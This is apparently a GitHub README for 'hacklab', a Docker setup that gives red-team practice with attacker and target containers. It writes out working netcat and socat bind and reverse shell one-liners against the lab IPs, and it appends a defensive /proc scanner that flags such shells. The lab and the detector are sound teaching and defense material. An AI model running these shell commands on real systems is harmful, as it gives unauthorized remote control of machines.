Wind010 / hacklab

Containers for red-teaming

Set up containers using Alpine Linux as target and attacker for red-team exercises.

  • The target has an IP address of 172.24.0.2.
  • The attacker has an IP address of 172.24.0.3.
  • The target and attacker have port 5009 exposed for TCP and UDP.
  • Port 5010 is exposed on the target and port 5011 is exposed on attacker to the host.

The static IP addresses for the containers can be removed for nmap practice. Install other tools as needed in the Dockerfile for each image.

Usage

Build and run the containers. They will stay running in the shell you're using.

docker-compose up

Open a new terminal and set up on the target container:

docker exec -it target /bin/bash

Open a new terminal and set up on the attacker container:

docker exec -it attacker /bin/bash

Bind Shells

Have the attacker connect to the target.

Netcat

Everybody's go-to. Instructions below are for the neutered netcat-openbsd version.

Manual

Set up the listener on the target:

mkfifo f
nc -l -p 5009 0<f | /bin/bash > f 2>&1

On attacker container, connect to target:

nc 172.24.0.2 5009 -vvv

Socat

Socat is a better option since you can use history and encryption with tty. The target machine is likely going to have netcat installed, but once a shell session is established, you can install other tools.

Find the target IP address and set up the listener:

socat TCP-LISTEN:5009,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane

On attacker container interactive bash, connect to the target:

socat FILE:`tty`,raw,echo=0 TCP4:172.24.0.2:5009

Stop connection with exit on attacker.

Reverse Shells

Have the target connect to the attacker. Circumvents inbound firewall rules.

Netcat

On the attacker, set up the listener:

nc -lvnp 5009 -vvv

On target container interactive bash, connect to the attacker:

rm -f f 2> /dev/null
mkfifo f
cat f | /bin/sh -i 2>&1 | nc 172.24.0.3 5009 > f

OR

nc 172.24.0.3 5009 0<f | /bin/sh -i 2>&1 | tee f

Socat

Set up the listener on the attacker:

socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:5009

On target container interactive bash, connect to the attacker:

socat TCP:172.24.0.3:5009 EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane

Stop connection with exit on attacker.

Cleanup

On the docker-compose terminal press ctrl+c to stop the running containers.

docker-compose down

Debugging

Docker Compose

docker-compose --verbose up

Show running container IP address from host:

docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container_name>

Show IP address from running container:

hostname -i

List running processes:

ps

Kill the specified process ID. You may need to do this for already running listeners.

kill <pid>

If you get connection refused, make sure your listener is running.
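
From the defender's side, the shells started above stand out in /proc: with the netcat and mkfifo setups the shell's stdio is a pipe or FIFO instead of a terminal, and with socat the shell's parent is socat. The following is an added example, not part of the hacklab repo, that lists such processes; the function name find_remote_shells and its PROC_ROOT argument are hypothetical, and pipe hits also occur for ordinary piped scripts, so treat them as leads to triage.

```shell
#!/bin/sh
# Added example, not part of the hacklab repo. Lists shell processes whose
# stdio or parent matches the bind/reverse shell setups in this README.
# Usage: source (.) this file, then run: find_remote_shells [PROC_ROOT]
find_remote_shells() {
    root=${1:-/proc}                      # PROC_ROOT is overridable for testing
    for dir in "$root"/[0-9]*; do
        [ -r "$dir/comm" ] || continue
        comm=$(cat "$dir/comm" 2>/dev/null) || continue
        case "$comm" in
            sh|ash|bash|dash) ;;          # only inspect shells
            *) continue ;;
        esac
        pid=${dir##*/}
        reason=
        # netcat + mkfifo setups: the shell's stdio is a pipe, FIFO or socket
        for fd in 0 1 2; do
            target=$(readlink "$dir/fd/$fd" 2>/dev/null) || continue
            case "$target" in
                socket:*) reason="$reason fd$fd=socket" ;;
                pipe:*)   reason="$reason fd$fd=pipe" ;;
                *) [ -p "$dir/fd/$fd" ] && reason="$reason fd$fd=fifo" ;;
            esac
        done
        # socat EXEC,pty setups: stdio is a pty, so look at the parent instead
        ppid=$(sed -n 's/^PPid:[[:space:]]*//p' "$dir/status" 2>/dev/null) || ppid=
        if [ -n "$ppid" ] && [ -r "$root/$ppid/comm" ]; then
            parent=$(cat "$root/$ppid/comm" 2>/dev/null) || parent=
            case "$parent" in
                nc|ncat|netcat|socat) reason="$reason parent=$parent" ;;
            esac
        fi
        [ -n "$reason" ] && echo "$pid $comm$reason"
    done
    return 0
}
```

Run it inside the target container while a listener or connect-back shell is active; each output line is a PID, the shell name and the reasons it was flagged.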

Disclaimer

This is for educational purposes. Do not attack unauthorized systems.

Tools

License:MIT License

